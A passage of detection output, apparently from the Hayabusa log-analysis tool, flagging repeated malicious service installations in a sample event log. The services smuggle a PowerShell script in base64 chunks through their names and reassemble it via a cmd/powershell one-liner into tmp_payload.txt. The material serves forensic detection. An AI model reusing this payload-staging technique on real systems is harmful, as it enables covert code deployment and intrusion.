KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 